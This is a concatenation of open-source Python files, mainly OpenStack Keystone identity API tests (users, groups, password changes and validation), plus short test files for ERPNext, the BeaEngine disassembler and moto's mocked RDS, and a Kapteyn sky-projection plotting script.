with mock.patch(
'oslo_log.versionutils.report_deprecated_feature') as mock_dep:
r = self.post('/users', body={'user': ref_nd}, auth=auth)
self.assertTrue(mock_dep.called)
ref['domain_id'] = CONF.identity.default_domain_id
return self.assertValidUserResponse(r, ref)
def test_create_user_with_admin_token_and_domain(self):
"""Call ``POST /users`` with admin token and domain id."""
ref = unit.new_user_ref(domain_id=self.domain_id)
self.post('/users', body={'user': ref}, token=self.get_admin_token(),
expected_status=http_client.CREATED)
def test_user_management_normalized_keys(self):
"""Illustrate the inconsistent handling of hyphens in keys.
To quote Morgan in bug 1526244:
the reason this is converted from "domain-id" to "domain_id" is
because of how we process/normalize data. The way we have to handle
specific data types for known columns requires avoiding "-" in the
actual python code since "-" is not valid for attributes in python
w/o significant use of "getattr" etc.
In short, historically we handle some things in conversions. The
use of "extras" has long been a poor design choice that leads to
odd/strange inconsistent behaviors because of other choices made in
handling data from within the body. (In many cases we convert from
"-" to "_" throughout openstack)
Source: https://bugs.launchpad.net/keystone/+bug/1526244/comments/9
"""
# Create two domains to work with.
domain1 = unit.new_domain_ref()
self.resource_api.create_domain(domain1['id'], domain1)
domain2 = unit.new_domain_ref()
self.resource_api.create_domain(domain2['id'], domain2)
# We can successfully create a normal user without any surprises.
user = unit.new_user_ref(domain_id=domain1['id'])
r = self.post(
'/users',
body={'user': user})
self.assertValidUserResponse(r, user)
user['id'] = r.json['user']['id']
# Query strings are not normalized: so we get all users back (like
# self.user), not just the ones in the specified domain.
r = self.get(
'/users?domain-id=%s' % domain1['id'])
self.assertValidUserListResponse(r, ref=self.user)
self.assertNotEqual(domain1['id'], self.user['domain_id'])
# When creating a new user, if we move the 'domain_id' into the
# 'domain-id' attribute, the server will normalize the request
# attribute, and effectively "move it back" for us.
user = unit.new_user_ref(domain_id=domain1['id'])
user['domain-id'] = user.pop('domain_id')
r = self.post(
'/users',
body={'user': user})
self.assertNotIn('domain-id', r.json['user'])
self.assertEqual(domain1['id'], r.json['user']['domain_id'])
# (move this attribute back so we can use assertValidUserResponse)
user['domain_id'] = user.pop('domain-id')
self.assertValidUserResponse(r, user)
user['id'] = r.json['user']['id']
# If we try updating the user's 'domain_id' by specifying a
# 'domain-id', then it'll be stored into extras rather than normalized,
# and the user's actual 'domain_id' is not affected.
r = self.patch(
'/users/%s' % user['id'],
body={'user': {'domain-id': domain2['id']}})
self.assertEqual(domain2['id'], r.json['user']['domain-id'])
self.assertEqual(user['domain_id'], r.json['user']['domain_id'])
self.assertNotEqual(domain2['id'], user['domain_id'])
self.assertValidUserResponse(r, user)
def test_create_user_bad_request(self):
"""Call ``POST /users``."""
self.post('/users', body={'user': {}},
expected_status=http_client.BAD_REQUEST)
def test_create_user_bad_domain_id(self):
"""Call ``POST /users``."""
# create user with 'DEFaUlT' domain_id instead if 'default'
# and verify it fails
self.post('/users',
body={'user': {"name": "baddomain", "domain_id":
"DEFaUlT"}},
expected_status=http_client.NOT_FOUND)
def test_list_head_users(self):
"""Call ``GET & HEAD /users``."""
resource_url = '/users'
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=self.user,
resource_url=resource_url)
self.head(resource_url, expected_status=http_client.OK)
def test_list_users_with_multiple_backends(self):
"""Call ``GET /users`` when multiple backends is enabled.
In this scenario, the controller requires a domain to be specified
either as a filter or by using a domain scoped token.
"""
self.config_fixture.config(group='identity',
domain_specific_drivers_enabled=True)
# Create a new domain with a new project and user
domain = unit.new_domain_ref()
self.resource_api.create_domain(domain['id'], domain)
project = unit.new_project_ref(domain_id=domain['id'])
self.resource_api.create_project(project['id'], project)
user = unit.create_user(self.identity_api, domain_id=domain['id'])
# Create both project and domain role grants for the user so we
# can get both project and domain scoped tokens
self.assignment_api.create_grant(
role_id=self.role_id, user_id=user['id'],
domain_id=domain['id'])
self.assignment_api.create_grant(
role_id=self.role_id, user_id=user['id'],
project_id=project['id'])
dom_auth = self.build_authentication_request(
user_id=user['id'],
password=user['password'],
domain_id=domain['id'])
project_auth = self.build_authentication_request(
user_id=user['id'],
password=user['password'],
project_id=project['id'])
# First try using a domain scoped token
resource_url = '/users'
r = self.get(resource_url, auth=dom_auth)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
# Now try using a project scoped token
resource_url = '/users'
r = self.get(resource_url, auth=project_auth)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
# Now try with an explicit filter
resource_url = ('/users?domain_id=%(domain_id)s' %
{'domain_id': domain['id']})
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
def test_list_users_no_default_project(self):
"""Call ``GET /users`` making sure no default_project_id."""
user = unit.new_user_ref(self.domain_id)
user = self.identity_api.create_user(user)
resource_url = '/users'
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
def test_get_head_user(self):
"""Call ``GET & HEAD /users/{user_id}``."""
resource_url = '/users/%(user_id)s' % {
'user_id': self.user['id']}
r = self.get(resource_url)
self.assertValidUserResponse(r, self.user)
self.head(resource_url, expected_status=http_client.OK)
def test_get_user_does_not_include_extra_attributes(self):
"""Call ``GET /users/{user_id}`` extra attributes are not included."""
user = unit.new_user_ref(domain_id=self.domain_id,
project_id=self.project_id)
user = self.identity_api.create_user(user)
self.assertNotIn('created_at', user)
self.assertNotIn('last_active_at', user)
r = self.get('/users/%(user_id)s' % {'user_id': user['id']})
self.assertValidUserResponse(r, user)
def test_get_user_with_default_project(self):
"""Call ``GET /users/{user_id}`` making sure of default_project_id."""
user = unit.new_user_ref(domain_id=self.domain_id,
project_id=self.project_id)
user = self.identity_api.create_user(user)
r = self.get('/users/%(user_id)s' % {'user_id': user['id']})
self.assertValidUserResponse(r, user)
def test_add_user_to_group(self):
"""Call ``PUT /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
def test_list_head_groups_for_user(self):
"""Call ``GET & HEAD /users/{user_id}/groups``."""
user1 = unit.create_user(self.identity_api,
domain_id=self.domain['id'])
user2 = unit.create_user(self.identity_api,
domain_id=self.domain['id'])
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': user1['id']})
# Scenarios below are written to test the default policy configuration
# One should be allowed to list one's own groups
auth = self.build_authentication_request(
user_id=user1['id'],
password=user1['password'])
resource_url = ('/users/%(user_id)s/groups' %
{'user_id': user1['id']})
r = self.get(resource_url, auth=auth)
self.assertValidGroupListResponse(r, ref=self.group,
resource_url=resource_url)
self.head(resource_url, auth=auth, expected_status=http_client.OK)
# Administrator is allowed to list others' groups
resource_url = ('/users/%(user_id)s/groups' %
{'user_id': user1['id']})
r = self.get(resource_url)
self.assertValidGroupListResponse(r, ref=self.group,
resource_url=resource_url)
self.head(resource_url, expected_status=http_client.OK)
# Ordinary users should not be allowed to list other's groups
auth = self.build_authentication_request(
user_id=user2['id'],
password=user2['password'])
resource_url = '/users/%(user_id)s/groups' % {
'user_id': user1['id']}
self.get(resource_url, auth=auth,
expected_status=exception.ForbiddenAction.code)
self.head(resource_url, auth=auth,
expected_status=exception.ForbiddenAction.code)
def test_check_user_in_group(self):
"""Call ``HEAD /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
self.head('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
def test_list_head_users_in_group(self):
"""Call ``GET & HEAD /groups/{group_id}/users``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
resource_url = ('/groups/%(group_id)s/users' %
{'group_id': self.group_id})
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=self.user,
resource_url=resource_url)
self.assertIn('/groups/%(group_id)s/users' % {
'group_id': self.group_id}, r.result['links']['self'])
self.head(resource_url, expected_status=http_client.OK)
def test_remove_user_from_group(self):
"""Call ``DELETE /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
self.delete('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
def test_update_user(self):
"""Call ``PATCH /users/{user_id}``."""
user = unit.new_user_ref(domain_id=self.domain_id)
del user['id']
r = self.patch('/users/%(user_id)s' % {
'user_id': self.user['id']},
body={'user': user})
self.assertValidUserResponse(r, user)
def test_admin_password_reset(self):
# bootstrap a user as admin
user_ref = unit.create_user(self.identity_api,
domain_id=self.domain['id'])
# auth as user should work before a password change
old_password_auth = self.build_authentication_request(
user_id=user_ref['id'],
password=user_ref['password'])
r = self.v3_create_token(old_password_auth)
old_token = r.headers.get('X-Subject-Token')
# auth as user with a token should work before a password change
old_token_auth = self.build_authentication_request(token=old_token)
self.v3_create_token(old_token_auth)
# administrative password reset
new_password = uuid.uuid4().hex
self.patch('/users/%s' % user_ref['id'],
body={'user': {'password': new_password}})
# auth as user with original password should not work after change
self.v3_create_token(old_password_auth,
expected_status=http_client.UNAUTHORIZED)
# auth as user with an old token should not work after change
self.v3_create_token(old_token_auth,
expected_status=http_client.NOT_FOUND)
# new password should work
new_password_auth = self.build_authentication_request(
user_id=user_ref['id'],
password=new_password)
self.v3_create_token(new_password_auth)
def test_update_user_domain_id(self):
"""Call ``PATCH /users/{user_id}`` with domain_id."""
user = unit.new_user_ref(domain_id=self.domain['id'])
user = self.identity_api.create_user(user)
user['domain_id'] = CONF.identity.default_domain_id
r = self.patch('/users/%(user_id)s' % {
'user_id': user['id']},
body={'user': user},
expected_status=exception.ValidationError.code)
self.config_fixture.config(domain_id_immutable=False)
user['domain_id'] = self.domain['id']
r = self.patch('/users/%(user_id)s' % {
'user_id': user['id']},
body={'user': user})
self.assertValidUserResponse(r, user)
def test_delete_user(self):
"""Call ``DELETE /users/{user_id}``.
As well as making sure the delete succeeds, we ensure
that any credentials that reference this user are
also deleted, while other credentials are unaffected.
In addition, no tokens should remain valid for this user.
"""
# First check the credential for this user is present
r = self.credential_api.get_credential(self.credential['id'])
self.assertDictEqual(self.credential, r)
# Create a second credential with a different user
user2 = unit.new_user_ref(domain_id=self.domain['id'],
project_id=self.project['id'])
user2 = self.identity_api.create_user(user2)
credential2 = unit.new_credential_ref(user_id=user2['id'],
project_id=self.project['id'])
self.credential_api.create_credential(credential2['id'], credential2)
# Create a token for this user which we can check later
# gets deleted
auth_data = self.build_authentication_request(
user_id=self.user['id'],
password=self.user['password'],
project_id=self.project['id'])
token = self.get_requested_token(auth_data)
# Confirm token is valid for now
self.head('/auth/tokens',
headers={'X-Subject-Token': token},
expected_status=http_client.OK)
# Now delete the user
self.delete('/users/%(user_id)s' % {
'user_id': self.user['id']})
# Deleting the user should have deleted any credentials
# that reference this project
self.assertRaises(exception.CredentialNotFound,
self.credential_api.get_credential,
self.credential['id'])
# And the no tokens we remain valid
tokens = self.token_provider_api._persistence._list_tokens(
self.user['id'])
self.assertEqual(0, len(tokens))
# But the credential for user2 is unaffected
r = self.credential_api.get_credential(credential2['id'])
self.assertDictEqual(credential2, r)
# group crud tests
def test_create_group(self):
"""Call ``POST /groups``."""
# Create a new group to avoid a duplicate check failure
ref = unit.new_group_ref(domain_id=self.domain_id)
r = self.post(
'/groups',
body={'group': ref})
return self.assertValidGroupResponse(r, ref)
def test_create_group_bad_request(self):
"""Call ``POST /groups``."""
self.post('/groups', body={'group': {}},
expected_status=http_client.BAD_REQUEST)
def test_list_head_groups(self):
"""Call ``GET & HEAD /groups``."""
resource_url = '/groups'
r = self.get(resource_url)
self.assertValidGroupListResponse(r, ref=self.group,
resource_url=resource_url)
self.head(resource_url, expected_status=http_client.OK)
def test_get_head_group(self):
"""Call ``GET & HEAD /groups/{group_id}``."""
resource_url = '/groups/%(group_id)s' % {
'group_id': self.group_id}
r = self.get(resource_url)
self.assertValidGroupResponse(r, self.group)
self.head(resource_url, expected_status=http_client.OK)
def test_update_group(self):
"""Call ``PATCH /groups/{group_id}``."""
group = unit.new_group_ref(domain_id=self.domain_id)
del group['id']
r = self.patch('/groups/%(group_id)s' % {
'group_id': self.group_id},
body={'group': group})
self.assertValidGroupResponse(r, group)
def test_update_group_domain_id(self):
"""Call ``PATCH /groups/{group_id}`` with domain_id."""
self.group['domain_id'] = CONF.identity.default_domain_id
r = self.patch('/groups/%(group_id)s' % {
'group_id': self.group['id']},
body={'group': self.group},
expected_status=exception.ValidationError.code)
self.config_fixture.config(domain_id_immutable=False)
self.group['domain_id'] = self.domain['id']
r = self.patch('/groups/%(group_id)s' % {
'group_id': self.group['id']},
body={'group': self.group})
self.assertValidGroupResponse(r, self.group)
def test_delete_group(self):
"""Call ``DELETE /groups/{group_id}``."""
self.delete('/groups/%(group_id)s' % {
'group_id': self.group_id})
def test_create_user_password_not_logged(self):
# When a user is created, the password isn't logged at any level.
log_fix = self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
ref = unit.new_user_ref(domain_id=self.domain_id)
self.post(
'/users',
body={'user': ref})
self.assertNotIn(ref['password'], log_fix.output)
def test_update_password_not_logged(self):
# When admin modifies user password, the password isn't logged at any
# level.
log_fix = self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
# bootstrap a user as admin
user_ref = unit.create_user(self.identity_api,
domain_id=self.domain['id'])
self.assertNotIn(user_ref['password'], log_fix.output)
# administrative password reset
new_password = uuid.uuid4().hex
self.patch('/users/%s' % user_ref['id'],
body={'user': {'password': new_password}})
self.assertNotIn(new_password, log_fix.output)
def test_setting_default_project_id_to_domain_failed(self):
"""Call ``POST and PATCH /users`` default_project_id=domain_id.
Make sure we validate the default_project_id if it is specified.
It cannot be set to a domain_id, even for a project acting as domain
right now. That's because we haven't sort out the issuing
project-scoped token for project acting as domain bit yet. Once we
got that sorted out, we can relax this constraint.
"""
# creating a new user with default_project_id set to a
# domain_id should result in HTTP 400
ref = unit.new_user_ref(domain_id=self.domain_id,
project_id=self.domain_id)
self.post('/users', body={'user': ref}, token=CONF.admin_token,
expected_status=http_client.BAD_REQUEST)
# updating user's default_project_id to a domain_id should result
# in HTTP 400
user = {'default_project_id': self.domain_id}
self.patch('/users/%(user_id)s' % {
'user_id': self.user['id']},
body={'user': user},
token=CONF.admin_token,
expected_status=http_client.BAD_REQUEST)
class IdentityV3toV2MethodsTestCase(unit.TestCase):
"""Test users V3 to V2 conversion methods."""
def new_user_ref(self, **kwargs):
"""Construct a bare bones user ref.
Omits all optional components.
"""
ref = unit.new_user_ref(**kwargs)
# description is already omitted
del ref['email']
del ref['enabled']
del ref['password']
return ref
def setUp(self):
super(IdentityV3toV2MethodsTestCase, self).setUp()
self.load_backends()
user_id = uuid.uuid4().hex
project_id = uuid.uuid4().hex
# User with only default_project_id in ref
self.user1 = self.new_user_ref(
id=user_id,
name=user_id,
project_id=project_id,
domain_id=CONF.identity.default_domain_id)
# User without default_project_id or tenantId in ref
self.user2 = self.new_user_ref(
id=user_id,
name=user_id,
domain_id=CONF.identity.default_domain_id)
# User with both tenantId and default_project_id in ref
self.user3 = self.new_user_ref(
id=user_id,
name=user_id,
project_id=project_id,
tenantId=project_id,
domain_id=CONF.identity.default_domain_id)
# User with only tenantId in ref
self.user4 = self.new_user_ref(
id=user_id,
name=user_id,
tenantId=project_id,
domain_id=CONF.identity.default_domain_id)
# Expected result if the user is meant to have a tenantId element
self.expected_user = {'id': user_id,
'name': user_id,
'username': user_id,
'tenantId': project_id}
# Expected result if the user is not meant to have a tenantId element
self.expected_user_no_tenant_id = {'id': user_id,
'name': user_id,
'username': user_id}
def test_v3_to_v2_user_method(self):
updated_user1 = controller.V2Controller.v3_to_v2_user(self.user1)
self.assertIs(self.user1, updated_user1)
self.assertDictEqual(self.expected_user, self.user1)
updated_user2 = controller.V2Controller.v3_to_v2_user(self.user2)
self.assertIs(self.user2, updated_user2)
self.assertDictEqual(self.expected_user_no_tenant_id, self.user2)
updated_user3 = controller.V2Controller.v3_to_v2_user(self.user3)
self.assertIs(self.user3, updated_user3)
self.assertDictEqual(self.expected_user, self.user3)
updated_user4 = controller.V2Controller.v3_to_v2_user(self.user4)
self.assertIs(self.user4, updated_user4)
self.assertDictEqual(self.expected_user_no_tenant_id, self.user4)
def test_v3_to_v2_user_method_list(self):
user_list = [self.user1, self.user2, self.user3, self.user4]
updated_list = controller.V2Controller.v3_to_v2_user(user_list)
self.assertEqual(len(user_list), len(updated_list))
for i, ref in enumerate(updated_list):
# Order should not change.
self.assertIs(ref, user_list[i])
self.assertDictEqual(self.expected_user, self.user1)
self.assertDictEqual(self.expected_user_no_tenant_id, self.user2)
self.assertDictEqual(self.expected_user, self.user3)
self.assertDictEqual(self.expected_user_no_tenant_id, self.user4)
class UserSelfServiceChangingPasswordsTestCase(test_v3.RestfulTestCase):
def setUp(self):
super(UserSelfServiceChangingPasswordsTestCase, self).setUp()
self.user_ref = unit.create_user(self.identity_api,
domain_id=self.domain['id'])
self.token = self.get_request_token(self.user_ref['password'],
http_client.CREATED)
def get_request_token(self, password, expected_status):
auth_data = self.build_authentication_request(
user_id=self.user_ref['id'],
password=password)
r = self.v3_create_token(auth_data,
expected_status=expected_status)
return r.headers.get('X-Subject-Token')
def change_password(self, expected_status, **kwargs):
"""Return a test response for a change password request."""
return self.post('/users/%s/password' % self.user_ref['id'],
body={'user': kwargs},
token=self.token,
expected_status=expected_status)
def test_changing_password(self):
# original password works
token_id = self.get_request_token(self.user_ref['password'],
expected_status=http_client.CREATED)
# original token works
old_token_auth = self.build_authentication_request(token=token_id)
self.v3_create_token(old_token_auth)
# change password
new_password = uuid.uuid4().hex
self.change_password(password=new_password,
original_password=self.user_ref['password'],
expected_status=http_client.NO_CONTENT)
# old password fails
self.get_request_token(self.user_ref['password'],
expected_status=http_client.UNAUTHORIZED)
# old token fails
self.v3_create_token(old_token_auth,
expected_status=http_client.NOT_FOUND)
# new password works
self.get_request_token(new_password,
expected_status=http_client.CREATED)
def test_changing_password_with_missing_original_password_fails(self):
r = self.change_password(password=uuid.uuid4().hex,
expected_status=http_client.BAD_REQUEST)
self.assertThat(r.result['error']['message'],
matchers.Contains('original_password'))
def test_changing_password_with_missing_password_fails(self):
r = self.change_password(original_password=self.user_ref['password'],
expected_status=http_client.BAD_REQUEST)
self.assertThat(r.result['error']['message'],
matchers.Contains('password'))
def test_changing_password_with_incorrect_password_fails(self):
self.change_password(password=uuid.uuid4().hex,
original_password=uuid.uuid4().hex,
expected_status=http_client.UNAUTHORIZED)
def test_changing_password_with_disabled_user_fails(self):
# disable the user account
self.user_ref['enabled'] = False
self.patch('/users/%s' % self.user_ref['id'],
body={'user': self.user_ref})
self.change_password(password=uuid.uuid4().hex,
original_password=self.user_ref['password'],
expected_status=http_client.UNAUTHORIZED)
def test_changing_password_not_logged(self):
# When a user changes their password, the password isn't logged at any
# level.
log_fix = self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
# change password
new_password = uuid.uuid4().hex
self.change_password(password=new_password,
original_password=self.user_ref['password'],
expected_status=http_client.NO_CONTENT)
self.assertNotIn(self.user_ref['password'], log_fix.output)
self.assertNotIn(new_password, log_fix.output)
class PasswordValidationTestCase(UserSelfServiceChangingPasswordsTestCase):
"""Test password validation."""
def setUp(self):
super(PasswordValidationTestCase, self).setUp()
# passwords requires: 1 letter, 1 digit, 7 chars
self.config_fixture.config(group='security_compliance',
password_regex=(
'^(?=.*\d)(?=.*[a-zA-Z]).{7,}$'))
def test_create_user_with_invalid_password(self):
user = unit.new_user_ref(domain_id=self.domain_id)
user['password'] = 'simple'
self.post('/users', body={'user': user}, token=self.get_admin_token(),
expected_status=http_client.BAD_REQUEST)
def test_update_user_with_invalid_password(self):
user = unit.create_user(self.identity_api,
domain_id=self.domain['id'])
user['password'] = 'simple'
self.patch('/users/%(user_id)s' % {
'user_id': user['id']},
body={'user': user},
expected_status=http_client.BAD_REQUEST)
def test_changing_password_with_simple_password_strength(self):
# password requires: any non-whitespace character
self.config_fixture.config(group='security_compliance',
password_regex='[\S]+')
self.change_password(password='simple',
original_password=self.user_ref['password'],
expected_status=http_client.NO_CONTENT)
def test_changing_password_with_strong_password_strength(self):
self.change_password(password='mypassword2',
original_password=self.user_ref['password'],
expected_status=http_client.NO_CONTENT)
def test_changing_password_with_strong_password_strength_fails(self):
# no digit
self.change_password(password='mypassword',
original_password=self.user_ref['password'],
expected_status=http_client.BAD_REQUEST)
# no letter
self.change_password(password='12345678',
original_password=self.user_ref['password'],
expected_status=http_client.BAD_REQUEST)
# less than 7 chars
self.change_password(password='mypas2',
original_password=self.user_ref['password'],
expected_status=http_client.BAD_REQUEST)
| cernops/keystone | keystone/tests/unit/test_v3_identity.py | Python | apache-2.0 | 37,174 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, unittest
test_records = frappe.get_test_records('Fiscal Year')
test_ignore = ["Company"]
class TestFiscalYear(unittest.TestCase):
def test_extra_year(self):
if frappe.db.exists("Fiscal Year", "_Test Fiscal Year 2000"):
frappe.delete_doc("Fiscal Year", "_Test Fiscal Year 2000")
fy = frappe.get_doc({
"doctype": "Fiscal Year",
"year": "_Test Fiscal Year 2000",
"year_end_date": "2002-12-31",
"year_start_date": "2000-04-01"
})
fy.insert()
self.assertEqual(fy.year_end_date, '2001-03-31')
| ESS-LLP/erpnext-medical | erpnext/accounts/doctype/fiscal_year/test_fiscal_year.py | Python | gpl-3.0 | 700 |
from kapteyn import maputils
import numpy
from service import *
fignum = 6
fig = plt.figure(figsize=figsize)
frame = fig.add_axes(plotbox)
title = r"Stereographic projection (STG) diverges at $\theta=-90^\circ$. (Cal. fig.9)"
header = {'NAXIS' : 2, 'NAXIS1': 100, 'NAXIS2': 80,
'CTYPE1' : 'RA---STG',
'CRVAL1' :0.0, 'CRPIX1' : 50, 'CUNIT1' : 'deg', 'CDELT1' : -12.0,
'CTYPE2' : 'DEC--STG',
'CRVAL2' : dec0, 'CRPIX2' : 40, 'CUNIT2' : 'deg', 'CDELT2' : 12.0,
}
X = numpy.arange(0,360.0,30.0)
Y = numpy.arange(-60,90,10.0)
f = maputils.FITSimage(externalheader=header)
annim = f.Annotatedimage(frame)
grat = annim.Graticule(axnum= (1,2),
wylim=(-60,90.0), wxlim=(0,360),
startx=X, starty=Y)
lat_constval = -62
lon_world = list(range(0,360,30))
lat_world = list(range(-50, 10, 10))
addangle0 = -90
labkwargs1 = {'color':'b', 'va':'bottom', 'ha':'right'}
doplot(frame, fignum, annim, grat, title,
lon_world=lon_world, lat_world=lat_world, lat_constval=lat_constval,
addangle0=addangle0, labkwargs1=labkwargs1, markerpos=markerpos)
| kapteyn-astro/kapteyn | doc/source/EXAMPLES/allskyf6.py | Python | bsd-3-clause | 1,138 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
def test(self):
# EVEX.128.66.0F38.W0 A0 /vsib
# VPSCATTERDD vm32x {k1}, xmm1
myEVEX = EVEX('EVEX.128.66.0F38.W0')
myEVEX.aaa = 1
Buffer = bytes.fromhex('{}a0443322'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.infos.Options = ShowEVEXMasking
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0xa0)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpscatterdd')
assert_equal(myDisasm.repr(), 'vpscatterdd dword ptr [r11+xmm30+0088h] {k1}, xmm24')
# EVEX.256.66.0F38.W0 A0 /vsib
# VPSCATTERDD vm32y {k1}, ymm1
myEVEX = EVEX('EVEX.256.66.0F38.W0')
myEVEX.aaa = 1
Buffer = bytes.fromhex('{}a0443322'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.infos.Options = ShowEVEXMasking
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0xa0)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpscatterdd')
assert_equal(myDisasm.repr(), 'vpscatterdd dword ptr [r11+ymm30+0088h] {k1}, ymm24')
# EVEX.512.66.0F38.W0 A0 /vsib
# VPSCATTERDD vm32z {k1}, zmm1
myEVEX = EVEX('EVEX.512.66.0F38.W0')
myEVEX.aaa = 1
Buffer = bytes.fromhex('{}a0443322'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.infos.Options = ShowEVEXMasking
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0xa0)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpscatterdd')
assert_equal(myDisasm.repr(), 'vpscatterdd dword ptr [r11+zmm30+0088h] {k1}, zmm24')
# EVEX.128.66.0F38.W1 A0 /vsib
# VPSCATTERDQ vm32x {k1}, xmm1
myEVEX = EVEX('EVEX.128.66.0F38.W1')
myEVEX.aaa = 1
Buffer = bytes.fromhex('{}a0443322'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.infos.Options = ShowEVEXMasking
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0xa0)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpscatterdq')
assert_equal(myDisasm.repr(), 'vpscatterdq dword ptr [r11+xmm30+0110h] {k1}, xmm24')
# EVEX.256.66.0F38.W1 A0 /vsib
# VPSCATTERDQ vm32x {k1}, ymm1
myEVEX = EVEX('EVEX.256.66.0F38.W1')
myEVEX.aaa = 1
Buffer = bytes.fromhex('{}a0443322'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.infos.Options = ShowEVEXMasking
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0xa0)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpscatterdq')
assert_equal(myDisasm.repr(), 'vpscatterdq dword ptr [r11+xmm30+0110h] {k1}, ymm24')
# EVEX.512.66.0F38.W1 A0 /vsib
# VPSCATTERDQ vm32y {k1}, zmm1
myEVEX = EVEX('EVEX.512.66.0F38.W1')
myEVEX.aaa = 1
Buffer = bytes.fromhex('{}a0443322'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.infos.Options = ShowEVEXMasking
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0xa0)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpscatterdq')
assert_equal(myDisasm.repr(), 'vpscatterdq dword ptr [r11+ymm30+0110h] {k1}, zmm24')
| 0vercl0k/rp | src/third_party/beaengine/tests/0f38a0.py | Python | mit | 4,160 |
from __future__ import unicode_literals
import boto3
import boto.rds
import boto.vpc
from boto.exception import BotoServerError
import sure # noqa
from moto import mock_ec2_deprecated, mock_rds_deprecated, mock_rds
from tests.helpers import disable_on_py3
@mock_rds_deprecated
def test_create_database():
conn = boto.rds.connect_to_region("us-west-2")
database = conn.create_dbinstance(
"db-master-1", 10, "db.m1.small", "root", "hunter2", security_groups=["my_sg"]
)
database.status.should.equal("available")
database.id.should.equal("db-master-1")
database.allocated_storage.should.equal(10)
database.instance_class.should.equal("db.m1.small")
database.master_username.should.equal("root")
database.endpoint.should.equal(
("db-master-1.aaaaaaaaaa.us-west-2.rds.amazonaws.com", 3306)
)
database.security_groups[0].name.should.equal("my_sg")
@mock_rds_deprecated
def test_get_databases():
conn = boto.rds.connect_to_region("us-west-2")
list(conn.get_all_dbinstances()).should.have.length_of(0)
conn.create_dbinstance("db-master-1", 10, "db.m1.small", "root", "hunter2")
conn.create_dbinstance("db-master-2", 10, "db.m1.small", "root", "hunter2")
list(conn.get_all_dbinstances()).should.have.length_of(2)
databases = conn.get_all_dbinstances("db-master-1")
list(databases).should.have.length_of(1)
databases[0].id.should.equal("db-master-1")
@mock_rds
def test_get_databases_paginated():
conn = boto3.client("rds", region_name="us-west-2")
for i in range(51):
conn.create_db_instance(
AllocatedStorage=5,
Port=5432,
DBInstanceIdentifier="rds%d" % i,
DBInstanceClass="db.t1.micro",
Engine="postgres",
)
resp = conn.describe_db_instances()
resp["DBInstances"].should.have.length_of(50)
resp["Marker"].should.equal(resp["DBInstances"][-1]["DBInstanceIdentifier"])
resp2 = conn.describe_db_instances(Marker=resp["Marker"])
resp2["DBInstances"].should.have.length_of(1)
@mock_rds_deprecated
def test_describe_non_existent_database():
conn = boto.rds.connect_to_region("us-west-2")
conn.get_all_dbinstances.when.called_with("not-a-db").should.throw(BotoServerError)
@mock_rds_deprecated
def test_delete_database():
conn = boto.rds.connect_to_region("us-west-2")
list(conn.get_all_dbinstances()).should.have.length_of(0)
conn.create_dbinstance("db-master-1", 10, "db.m1.small", "root", "hunter2")
list(conn.get_all_dbinstances()).should.have.length_of(1)
conn.delete_dbinstance("db-master-1")
list(conn.get_all_dbinstances()).should.have.length_of(0)
@mock_rds_deprecated
def test_delete_non_existent_database():
conn = boto.rds.connect_to_region("us-west-2")
conn.delete_dbinstance.when.called_with("not-a-db").should.throw(BotoServerError)
@mock_rds_deprecated
def test_create_database_security_group():
conn = boto.rds.connect_to_region("us-west-2")
security_group = conn.create_dbsecurity_group("db_sg", "DB Security Group")
security_group.name.should.equal("db_sg")
security_group.description.should.equal("DB Security Group")
